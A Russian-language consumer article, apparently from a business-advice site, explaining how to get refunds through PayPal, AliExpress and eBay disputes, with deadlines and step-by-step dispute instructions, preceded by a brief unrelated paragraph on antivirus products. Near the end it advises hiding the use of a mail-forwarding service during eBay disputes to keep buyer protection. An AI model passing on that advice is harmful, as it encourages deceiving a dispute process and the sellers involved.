Если говорить о хороших антивирусах, то можно выделить три основных: антивирус касперского, доктор веб, и NOD32. Каждый по своему хорош, и каждый имеет различные плюсы и преимущества. Вы спросите, какой лучше? Тут ответить тяжело. Нужно пробовать, сравнивать, читать отзывы пользователей каждого из них.

Команда проекта «Анатомия Бизнеса» желает, чтоб ваши покупки были по самым оптимальным ценам, а вопрос безопасности никогда не тревожил.

Способы вернуть деньги через PayPal без лишней нервотрепки

Необходимость вернуть деньги через PayPal возникает при покупках на зарубежных торговых площадках типа Ebay и Aliexpress, а также в частных интернет-магазинах. Для того чтобы не потерять право на отказ от сделки требуется жесткое соблюдение сроков и условий платежной системы. Знакомый с правилами покупатель повышает свои шансы на быстрое решение проблемы.

В каких случаях можно рассчитывать на возврат средств

Претендовать на манибек могут клиенты, которые произвели первичную оплату товара с помощью PayPal. Если покупка оплачивалась другим способом, а продавец предлагает вернуть средства на ПейПал, то для системы это — обычный перевод, а не манибек. В таком случае программа защиты покупателя не работает.

Ситуации, в которых возможен возврат средств в PayPal:

  1. Платеж еще не до конца обработан.
  2. Посылка не приходит долгое время, нет номера трека.
  3. Товар пришел бракованный, в неполной комплектации, поломанный или не соответствует описанию.
  4. Продавец признает ошибку и готов вернуть часть оплаты.
  5. Платеж проведен несанкционированно (взлом кошелька и т.п.)

Если продавец в объявлении точно описал дефекты, товар продавался как б/у и имеет незначительные царапины, то получить средства назад не получится.

Сначала пробуют договориться об отмене сделке со второй стороной. Если магазин не признает за собой ошибок или игнорирует, то в течение 180 дней с момента платежа открывают диспут в Центре Разрешения Проблем.

Возмещение затрат на обратную доставку

Для российских клиентов PayPal предлагает услугу бесплатной обратной доставки товаров. Воспользоваться предложением можно если покупка просто не подошла. Актуально для любых служб (EMS, DHL, FedEx, UPS и т.д.)

Максимальная сумма возмещения — 1500 руб.

Способы возврата денежных средств через PayPal

Если случай пользователя подпадает под программу защиты покупателей, магазин не идет на компромисс и прошло менее 180 дней, то переходят к решительным действиям. В системе предусмотрены следующие способы возврата денег за неудачную покупку:

  • добровольное возмещение продавцом,
  • диспут,
  • претензия,
  • отмена платежа.

Адекватный селлер сделает манибек, если был перепутан адрес доставки или модель товара, не работает почта в нужном направлении и т.д. Но в ситуациях, когда продавец считает себя невиновным, возвращать никто ничего не будет. Придется выводить конфликт на новый уровень — открывать спор в Центре разрешения проблем. Можно сравнить это с досудебным уведомлением.

Сторонам спора дается 20 суток на то, чтобы договориться. По истечении срока диспут завершается автоматически, если заказчик не переводит его в статус «Претензия». Этим пользуются ушлые продавцы — заговаривают зубы, обещают возврат, тянут время.

Претензию рассматривает модератор-судья. Если он сочтет права покупателя нарушенными, то создаст заявку на возмещение со счета магазина. Перевод осуществляется в принудительном режиме (можно провести аналогию с исполнительным листом и судебными приставами).

Когда сделки совершаются на крупных торговых площадках, то эффективней решать вопрос местными инструментами.

В случае неудачной покупки на Алиэкспресс

На Aliexpress большинство сделок проходят с 60-дневной гарантией. Если за это время покупатель не получил заказ в надлежащем виде, то он имеет право открыть спор в местном арбитраже. Продавец может продлить защиту заказа, если доставка задерживается по вине транспортной компании. В таком случае спор следует открывать не позже, чем за 5 дней до конца расширенного срока.

После нажатия кнопки «Заказ получен» есть только две недели на официальные претензии.

Магазин получает оплату на свой счет в двух случаях:

  • заказчик подтвердил, что посылка уже на руках;
  • закончился период защиты (двухмесячный или продленный) и клиент не заявил о пропаже отправления.

Часто удается получить «досудебное» частичное возмещение в случае незначительных дефектов.

Сам процесс арбитража принципиально не отличается от процедуры на сайте PayPal. Здесь также встречаются хитрецы двух типов. Первые тянут время до автоматического закрытия прений. Вторые предлагают отправить деньги сразу после снятия претензий. Обе линии поведения — мошеннические. Отправлять деньги назад никто из них не собирается.

Особенности для eBay

Срок на открытие диспута в Ebay самый маленький — всего 45 дней со дня оплаты. Центр решения конфликтов находится в подвале сайта и действует по общепринятой схеме.

В заявке указывается проблема и все подробности. Последовательно проходят этапы самостоятельного урегулирования ситуации сторонами, обострения конфликта и вынесения решения модератором.

Если прошло больше 45 дней, то единственный вариант — возврат денег через арбитраж PayPal.

Как оспорить операцию с помощью Центра разрешения проблем

После входа в свой аккаунт открывают страницу центра по ссылке https://www.paypal.com/disputes/

Нажимают «Сообщить о проблеме» и в открывшемся списке выбирают нужную транзакцию. Далее указывают, что именно случилось.

К диалогу подключается продавец. Если за 20 дней решение не найдено, то в деталях диспута используют ссылку «Эскалировать и отправить в PayPal». Нужно будет кратко описать всю суть, приложить доказательства.

В течение разбирательств модератор запрашивает дополнительную информацию у обеих сторон. Длиться процесс может до 30 дней.

В случае, если победа остается за покупателем, принимается решение о частичном либо полном возврате средств. Некачественный товар доставляется обратно за счет компании или остается на руках.

Инструкция для отмены незавершенного платежа

Транзакции не всегда быстро доходят до адресата. Этот, казалось бы, недостаток дает возможность передумать и отказаться от сделки.

Чтобы отменить платеж в PayPal, необходимо:

  1. Войти в личный кабинет.
  2. Открыть раздел «История», или Activity в английской версии.

  1. Найти в истории переводов нужный и просмотреть его статус. Рядом с еще неполученным будет кнопка «Отмена»/Cancel.

  1. Подтвердить отмену во всех всплывающих окнах.

Если в описании платежа указано, что адресат успешно получил его, то нужно использовать другие способы.

Определение контактной информации продавца

При заключении сделок на крупных торговых площадках связываться с продавцом и просить об отмене легко. Если же покупка совершалась в частном интернет-магазине, на форуме или лендинге, то возникнут проблемы с поиском контактов.

Вот как находят данные на сайте ЭПС:

  1. Входят в свой личный кабинет.
  2. Открывают вкладку «История».

  1. Выбирают из списка проблемную операцию. Кликают по ней.
  2. Открывается страница сведений о транзакции, на которой указаны имя, почта и телефон (если известен).

О сроках ожидания и возможных проблемах

На подачу претензии пострадавший имеет 180 дней на PayPal, 60 — на Aliexpress, 45 — на Ebay.

Больше всего времени отнимает разбирательство претензии модератором площадки — до 30 дней. Деньги поступают на счет в течение 7 дней. Если покупка оплачивалась с банковской карты, привязанной к PayPal, то возврат поступит на нее. При этом Сбербанк и Приватбанк могут затянуть обработку платежа, снять высокую комиссию за конвертацию в рубли и гривны соответственно.

Если удалось отменить платеж в кошельке PayPal, то возврат произойдет также в течение недели.

При использовании компании-посредника (mail-forwarding) Ebay снимает все свои обязательства по защите покупателя. При разбирательствах следует умолчать о таком факте.

Заказчик может отзывать платеж в личном кабинете при условии, что он не был востребован. Имеет право открывать спор и отменять сделку, если не получил посылку, товар не соответствует описанию (другая модель, не оригинал, дефекты). Оплачивать обратную пересылку товара будет продавец либо PayPal.

Ссылка на основную публикацию